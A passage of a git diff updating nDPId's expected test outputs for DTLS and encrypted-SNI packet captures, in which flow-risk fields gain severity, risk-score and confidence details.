+01237{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1556606275726,"flow_last_seen":1556606276035,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":2104,"flow_avg_l4_payload_len":526,"midstream":0,"ts_msec":1556606276035,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"3c3d129780d0066cd8936a6291a8d44f","ja3s":"d45798bc098cd930de7eb2f5f866e994","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}}
+01065{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1556606275726,"flow_last_seen":1556606278645,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":5138,"flow_avg_l4_payload_len":256,"midstream":0,"ts_msec":1556606278645,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}}
 00174{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 20/20
@@ -15,10 +15,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595409 bytes
-~~ total memory freed........: 4595409 bytes
-~~ total allocations/frees...: 99573/99573
+~~ total memory allocated....: 4680362 bytes
+~~ total memory freed........: 4680362 bytes
+~~ total allocations/frees...: 101163/101163
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 179 chars
-~~ json string max len.......: 955 chars
-~~ json string avg len.......: 631 chars
+~~ json string max len.......: 1242 chars
+~~ json string avg len.......: 767 chars
diff --git a/test/results/dtls_session_id_and_coockie_both.pcap.out b/test/results/dtls_session_id_and_coockie_both.pcap.out
index 7e427c8ae..88aa9b0ec 100644
--- a/test/results/dtls_session_id_and_coockie_both.pcap.out
+++ b/test/results/dtls_session_id_and_coockie_both.pcap.out
@@ -1,11 +1,11 @@
 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388499775,"flow_last_seen":1592388499775,"flow_idle_time":180000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1592388499775,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00587{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592388499775,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"ts_msec":1592388499775,"pkt":"AAAAAAAAAAEAvpsKCABFAAB\/T3sAAH8RdtO5xHHv33Rp98RRrZsAazO3Fv79AAAAAAAAAAAAVgEAAEoAAAAAAAAASv79P8FbOXt8ZkgBLvoC72ni+sdFNMYxwEb+hvs\/sv9L1B0gODIAL4OTx2HjtkquDfJ\/XJtXFrGeH36FJxKlpF5tST4AAALALAEA"}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388499775,"flow_last_seen":1592388499775,"flow_idle_time":180000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1592388499775,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"e15c510766789ed8f49de0e37951c1da","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388499775,"flow_last_seen":1592388499775,"flow_idle_time":180000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1592388499775,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"e15c510766789ed8f49de0e37951c1da","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592388499786,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1592388499786,"pkt":"AAAAAAAAAAcAwedSCABFAABMjnQAAPMRxAzfdGn3ucRx762bxFEAOGNSFv7\/AAAAAAAAAAAAIwMAABcAAAAAAAAAF\/7\/FBwO\/CFwEASeBoBTHTZO4F6qQqae"}
 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592388499813,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"ts_msec":1592388499813,"pkt":"AAAAAAAAAAEAvpsKCABFAACTT3wAAH8Rdr65xHHv33Rp98RRrZsAf9dAFv79AAAAAAAAAAEAagEAAF4AAQAAAAAAXv79P8FbOXt8ZkgBLvoC72ni+sdFNMYxwEb+hvs\/sv9L1B0gODIAL4OTx2HjtkquDfJ\/XJtXFrGeH36FJxKlpF5tST4UHA78IXAQBJ4GgFMdNk7gXqpCpp4AAsAsAQA="}
-00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592388499775,"flow_last_seen":1592388499833,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1592388499833,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"e15c510766789ed8f49de0e37951c1da","ja3s":"a1d48eca741e476d8ee735578a26bdbd","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}}
-00761{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592388499775,"flow_last_seen":1592388499833,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1592388499833,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"DTLS","breed":"Safe","category":"Web"}}
+01132{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592388499775,"flow_last_seen":1592388499833,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1592388499833,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"e15c510766789ed8f49de0e37951c1da","ja3s":"a1d48eca741e476d8ee735578a26bdbd","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}}
+00947{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592388499775,"flow_last_seen":1592388499833,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1592388499833,"l3_proto":"ip4","src_ip":"185.196.113.239","dst_ip":"223.116.105.247","src_port":50257,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}}
 00179{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"dtls_session_id_and_coockie_both.pcap","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 4/4
@@ -15,10 +15,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594945 bytes
-~~ total memory freed........: 4594945 bytes
-~~ total allocations/frees...: 99557/99557
+~~ total memory allocated....: 4679898 bytes
+~~ total memory freed........: 4679898 bytes
+~~ total allocations/frees...: 101147/101147
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 184 chars
-~~ json string max len.......: 951 chars
-~~ json string avg len.......: 631 chars
+~~ json string max len.......: 1137 chars
+~~ json string avg len.......: 722 chars
diff --git a/test/results/encrypted_sni.pcap.out b/test/results/encrypted_sni.pcap.out
index 15a6ced24..a6cdf24b4 100644
--- a/test/results/encrypted_sni.pcap.out
+++ b/test/results/encrypted_sni.pcap.out
@@ -1,13 +1,13 @@
 00445{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"encrypted_sni.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01415{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"ts_msec":1590680386576,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGjOfAqAEMaBuBTcLeAbt3Q5LX\/48DFVAYIACwHgAAFgMBAscBAALDAwOTwM86TEdZaYZx77QiKeLaOUyI6FPS+J3L+0S3MA31OCDtrXy2AkmiC5EC8aXH8NKs5TG5ofTGvlsmIWUcTFlOhgAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg9C+VXLX0pUAYcvwRMlm2BfjMFL+A2Ha+teHeYm8XszAAFwBBBKhP+5j\/iIqKULsVEv1xkLdgIoxwczB5EVKfTq\/0aLaIOqqUx255GoGIKzaHGdYeWvgG2FTscntynOjMKiH+1xMAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAoJey8d6KdccaSJO2lCYt20kw0EEYFyldVNE\/b+wVlLQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJJYkyzxOIwgn94z1v2QNIt6jP8xZjqajLZOZBVhvvpl7nmhmH4lW1IkwcuGd4kzR+4ip9x\/EzAG6tckU\/flqZH1nG16JhZuu6rEiIYaISW303wwyjD1flAsQnOsqJ0PVy+NZQoiiKbjH4viDA+P+GiaonlAB8r2TaJD+948G4F7MBjpovbjBjfrBFM8f7NuL4fwv7ssjFdJ5mNaCsSn9Hj6115hdy9xFKhCCzMA44L9pVw\/vrGvG+5UfibZ5LK2nZAPALOtdzhzm7d0W1ff7a4XSuSSFRI3gCI5CHoPx4osmf747Wa4ElvuEUhPCcdTFrF6efl9qMHJEUwf8zrcwZxBFmZHEDMTcH8MlFUx5dN14A3E5eAVFahmuI+6IR1wd8HaXtmYAHAACQAE="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"ts_msec":1590680387847,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGkJDAqAEMaBB9r8LfAbu98X4VZuCG7lAYIACqfgAAFgMBAscBAALDAwPZvt6xqK7JiSO2eRBioUk2Uu867QdPWpn6Sv4hYS472iAz8c+AKNafKEsBeorsjdYMXk2HdHvKJL23Af8gga\/qxAAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg0HCVKAanlLS9J1B8hdchDfkoKDxcPc3B5hBZYsZWdz8AFwBBBCakAur\/e3rF+tGl0au7NOTY4DQpBg\/YjV6ew74w8otvaCGiCdoeWGhEGjsldqwZrBxN3o59i8BSdRX+YPQ+GgkAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAFyK2kXV21yqtAW2T62b\/NDTnJgxOrhECle3qcjynhZQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJLkAAE456EuY9a6HsKAg7En+2G8rSItqsoven5V2IfJ3Q2bekOZcTKgIZokRYkaF7ExtxsFhqXy+gigbwIQnaXqjvmpA5fAKz4tj4ykxew5OhWQtUKuHkOYZfaYtn1syOdzFlDd5f+dopSDJ1HH+q6E3XfYeSjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtw\/pm8l4GeHZCKXzswlPS\/Jet6JKlP28PhB6QjuLs0HyKQD3u9h3gOMLbs85P+uPv\/61THn6BnP+Gq0XsiHUv\/ZFCqDNSvUTBmtmCAtgIUfzrLcUWkNsVonaILrLi\/m6vYUQElVuyPe7nXS\/qvJdz0NipXdWB8POXCwp8YOWkAHAACQAE="}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"ts_msec":1590680391590,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGxnTAqAEMaBZHxcLpAbsLJg40SW6gUlAYIAANXgAAFgMBAscBAALDAwMJLl9l\/OldUJYbpqd0xOpts3Kv4zg2hroTXcdX9KeB2CBjkfBVUTqX532YPuVZHQd0J5lIK2OZH9nsSRBnWwKDWwAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAgsbxhJX9IcnjB7rdgEb2YIBohnnxEhKIToNk1er8CIioAFwBBBLtlLNXLCuP0okhISXwuyj6tgeyLGZ5yaSZ9uT3zAbum2y5l1gYjS6RGBBL9dNcuY2pA4Ze582sOuuo0cAvw2TsAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACCgcq\/jSZGFwhXJHl9nfU84W9RHblecX+XHXi+knd++egAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJM1prHJ\/+qDqcKEqpG5xU365kjS5loGMkTxyoKwRhL+l3TthfgE+TKCSsunPt4vNjTPLrxKpdN+3jkm4v5pXmXQY7xTIeDCWHjyEgNKkvyfWHZEc70MAkkqfNhBXSLrthF\/1heQEBlRbs1xtqteJZDPsTf1rb0lyjahdcH23rHhPVaZljcat4wh7Hka7vt+kTz6HVLMaa8+FGdKR02KYBfqCbkN5nqbjMCHPCoPKBXF7APN9aYQZNPW1vyVMZGeIilksOKMAfbO31cu423QrZX+PlzwFC6qBeqVxOTzYpLwLIxJGCnfdBRD0u85D1TvPM05OjHVwJVu9F3FEA\/S2klQ0zWf5b6ngXXAHdoEO61eGscgYik1z+CCLYUuTKEqAk5KVlL4AHAACQAE="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 